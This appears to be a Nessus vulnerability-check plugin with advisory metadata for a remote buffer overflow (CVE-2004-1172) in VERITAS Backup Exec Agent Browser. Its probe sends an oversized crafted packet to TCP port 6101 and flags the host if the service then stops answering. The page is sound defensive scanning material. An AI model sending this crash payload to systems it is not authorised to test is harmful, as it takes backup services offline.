nessusThis script is Copyright (C) 2005-2018 Tenable Network Security, Inc.VERITAS_BACKUP_EXEC_OVERFLOW2.NASL
HistoryJan 24, 2005 - 12:00 a.m.

VERITAS Backup Exec Agent Browser Registration Request Remote Overflow

2005-01-2400:00:00
This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
www.tenable.com
14

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.95 High

EPSS

Percentile

99.3%

The remote host is running a version of VERITAS Backup Exec Agent Browser which is vulnerable to a remote buffer overflow. An attacker may exploit this flaw to execute arbitrary code on the remote host or to disable this service remotely.

To exploit this flaw, an attacker would need to send a specially crafted packet to the remote service.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Registration pass: when `description` is set, only the metadata below is
# recorded and the script exits before the network probe is reached.
if (description)
{
  # Plugin identity and revision.
  script_id(16232);
  script_version("1.21");
  script_cvs_date("Date: 2018/08/06 14:03:14");

  # Advisory cross-references for this finding.
  script_cve_id("CVE-2004-1172");
  script_bugtraq_id(11974);

  script_name(english:"VERITAS Backup Exec Agent Browser Registration Request Remote Overflow");
  script_summary(english:"Test the VERITAS Backup Exec Agent Browser buffer overflow");

  # Text shown in the scan report.
  script_set_attribute(attribute:"synopsis", value:"Arbitrary code can be executed on the remote host." );
  script_set_attribute(attribute:"description", value:"The remote host is running a version of VERITAS Backup Exec Agent Browser
which is vulnerable to a remote buffer overflow. An attacker may exploit this
flaw to execute arbitrary code on the remote host or to disable this service
remotely.

To exploit this flaw, an attacker would need to send a specially crafted packet
to the remote service." );
  # The remediation field carries only the vendor advisory URL.
  script_set_attribute(attribute:"solution", value:"http://support.veritas.com/docs/273419" );

  # Severity: unauthenticated, network-reachable, complete C/I/A impact.
  # Temporal vector: functional exploit (E:F), official fix (RL:OF),
  # confirmed report (RC:C).
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");

  # Exploit-availability flags, used to prioritise patching.
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Veritas Backup Exec Name Service Overflow');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  # Timeline and classification.
  script_set_attribute(attribute:"vuln_publication_date", value: "2004/12/16");
  script_set_attribute(attribute:"patch_publication_date", value: "2005/02/08");
  script_set_attribute(attribute:"plugin_publication_date", value: "2005/01/24");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:symantec:veritas_backup_exec");
  script_end_attributes();

  # Destructive category: the probe further down reports a finding only when
  # the service stops accepting connections, so this plugin belongs in scans
  # where taking the agent browser offline is acceptable.
  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");
  script_family(english:"Gain a shell remotely");

  # Only scheduled against hosts where TCP 6101 was found open.
  script_require_ports(6101);
  exit(0);
}

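# Active check. There is no banner or version comparison here: the script
# sends one oversized registration request to TCP 6101 and infers the result
# from whether the service still accepts connections afterwards. A finding
# therefore means the service was taken down by the scan and needs a restart.
port = 6101;
if (!get_port_state (port)) exit (0);

soc = open_sock_tcp (port);
if (!soc) exit (0);

# Probe bytes are kept exactly as published.
# NOTE(review): the address string is "172.0.0.1"; possibly a loopback
# address was intended. Left unchanged, confirm before altering.
request = raw_string (0x02, 0x00, 0x00, 0x00) + crap (data:'A', length:100) + raw_string (0x00) + "172.0.0.1" + raw_string (0x00);
send (socket:soc, data:request);

close (soc);

# Give the service time to go down before testing reachability again.
sleep(2);

soc = open_sock_tcp (port);
if ( ! soc )
{
  # NOTE(review): one failed reconnect is the only evidence used. Packet
  # filtering or a connection limit on the target would look the same, so
  # confirm the finding against the installed version before acting on it.
  security_hole(port);
}
else
{
  # Service survived the probe: release the second socket instead of leaving
  # it open until the script ends.
  close (soc);
}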
| Vendor | Product | Version | CPE |
| --- | --- | --- | --- |
| symantec | veritas_backup_exec | | cpe:/a:symantec:veritas_backup_exec |

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.95 High

EPSS

Percentile

99.3%